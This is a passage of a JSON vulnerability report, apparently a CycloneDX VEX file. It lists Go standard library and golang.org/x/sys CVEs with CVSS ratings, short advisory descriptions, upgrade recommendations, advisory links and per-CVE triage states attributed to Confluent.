          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1289
      ],
      "description": "The ToASCII and ToUnicode functions incorrectly accept Punycode-encoded labels that decode to an ASCII-only label. For example, ToUnicode(\"xn--example-.com\") incorrectly returns the name \"example.com\" rather than an error. This behavior can lead to privilege escalation in programs using the idna package. For example, a program which performs privilege checks on the ASCII hostname may reject \"example.com\" but permit \"xn--example-.com\". If that program subsequently converts the ASCII hostname to Unicode, it will inadvertently permits access to the Unicode name \"example.com\".",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39821"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:23262"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:23264"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26546"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26547"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30650"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30651"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30853"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30854"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30855"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33155"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33160"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33163"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33173"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33183"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33524"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33531"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34342"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34357"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34359"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34364"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34789"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35826"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35827"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35828"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35829"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35830"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35831"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35993"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:35994"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36105"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36167"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36207"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36648"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36651"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36797"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36808"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36820"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36883"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37387"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37435"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37436"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:38995"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39005"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39573"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39879"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40118"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40262"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40945"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41019"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41030"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41031"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41036"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41055"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41066"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41928"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41930"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42043"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42047"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42048"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42049"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42050"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42051"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42079"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42080"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42082"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42142"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42146"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42150"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42151"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42240"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42796"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42852"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43038"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43052"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43692"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44622"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:44624"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:46395"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47149"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47735"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47737"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:47952"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50300"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50843"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51033"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51112"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51187"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51194"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:51341"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:52826"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53412"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53413"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53415"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:53530"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54191"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54274"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54283"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54284"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54285"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54286"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54287"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54395"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54401"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54435"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54441"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54531"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54580"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56143"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56223"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56340"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56431"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-39821"
        },
        {
          "url": "https://bugzilla.redhat.com/2480756"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480756"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484207"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498152"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27145"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39821"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-39822"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-37435.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:38995"
        },
        {
          "url": "https://github.com/golang/go/issues/78760"
        },
        {
          "url": "https://go.dev/cl/767220"
        },
        {
          "url": "https://go.dev/issue/78760"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-39821.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-46395.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39821"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5026"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-39821.json"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8416-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-39821"
        }
      ],
      "published": "2026-05-22T16:16:20+00:00",
      "updated": "2026-08-19T12:18:01+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#911778cb-7312-4491-93b2-470ed078a036"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-39824",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [],
      "cwes": [
        190
      ],
      "description": "NewNTUnicodeString does not check for string length overflow. When provided with a string that overflows the maximum size of a NTUnicodeString (a 16-bit number of bytes), it returns a truncated string rather than an error.",
      "recommendation": "Upgrade golang.org/x/sys to version 0.44.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39824"
        },
        {
          "url": "https://go.dev/cl/770080"
        },
        {
          "url": "https://go.dev/issue/78916"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/6MMI8Lj-Atg"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5024"
        }
      ],
      "published": "2026-05-22T20:16:33+00:00",
      "updated": "2026-07-23T16:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:golang/golang.org/x/sys@v0.7.0",
          "versions": [
            {
              "version": "v0.7.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:golang/golang.org/x/sys@v0.7.0"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:golang/golang.org/x/sys@v0.7.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-46600",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Parsing an invalid SVCB or HTTPS RR can panic when the size of a parameter value overflows the message buffer.",
      "recommendation": "Upgrade stdlib to version 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-46600"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-46600"
        },
        {
          "url": "https://go.dev/cl/786345"
        },
        {
          "url": "https://go.dev/issue/79795"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46600"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-5942"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-46600"
        }
      ],
      "published": "2026-07-21T20:17:01+00:00",
      "updated": "2026-08-14T16:16:55+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#911778cb-7312-4491-93b2-470ed078a036"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-56853",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "When a server is configured to support unencrypted HTTP/2, it reads a few bytes from each new connection to see if they contain the HTTP/2 client preface. ReadHeaderTimeout is unexpectedly not being applied when doing this.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56853"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56853"
        },
        {
          "url": "https://go.dev/cl/795540"
        },
        {
          "url": "https://go.dev/issue/80205"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56853"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6089"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56853"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#911778cb-7312-4491-93b2-470ed078a036"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56858",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        79
      ],
      "description": "Previously, pathological inputs could close an unescaped '/' early, allowing for attack-controlled data to inject arbitrary content, potentially leading to XSS.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56858"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56858"
        },
        {
          "url": "https://go.dev/cl/807100"
        },
        {
          "url": "https://go.dev/issue/80435"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56858"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6091"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56858"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#911778cb-7312-4491-93b2-470ed078a036"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56859",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Previously, DecodeElement would reset the depth counter causing it to never fire; this could lead to stack exhaustion.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56859"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56859"
        },
        {
          "url": "https://go.dev/cl/803320"
        },
        {
          "url": "https://go.dev/issue/80481"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56859"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6088"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56859"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#911778cb-7312-4491-93b2-470ed078a036"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56860",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        407
      ],
      "description": "Previously, resolving relative paths containing parent directory ('..') segments performed string conversions and buffer rewrites on each step, resulting in quadratic time complexity and high memory allocation overhead. Now, path resolution operates on a byte buffer using index-based backtracking for '..' segments, eliminating the quadratic time complexity and significantly reducing memory allocations.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56860"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56860"
        },
        {
          "url": "https://go.dev/cl/803681"
        },
        {
          "url": "https://go.dev/issue/80494"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56860"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6218"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56860"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T17:19:13+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#911778cb-7312-4491-93b2-470ed078a036"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56862",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Handshake messages, such as KeyUpdate, are always considered as state-advancing, regardless of whether a handshake has been completed or not. As a result, a malicious client can keep sending KeyUpdate messages to force the server to keep performing key derivation operations indefinitely.",
      "recommendation": "Upgrade stdlib to version 1.25.13, 1.26.6, 1.27.0-rc.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56862"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56862"
        },
        {
          "url": "https://go.dev/cl/804261"
        },
        {
          "url": "https://go.dev/issue/80528"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/94pEornpRlI"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56862"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-6090"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56862"
        }
      ],
      "published": "2026-08-13T22:17:22+00:00",
      "updated": "2026-08-14T16:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:golang/stdlib@v1.26.5",
          "versions": [
            {
              "version": "v1.26.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:golang/stdlib@v1.26.5"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#911778cb-7312-4491-93b2-470ed078a036"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:golang/stdlib@v1.26.5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    }
  ]
}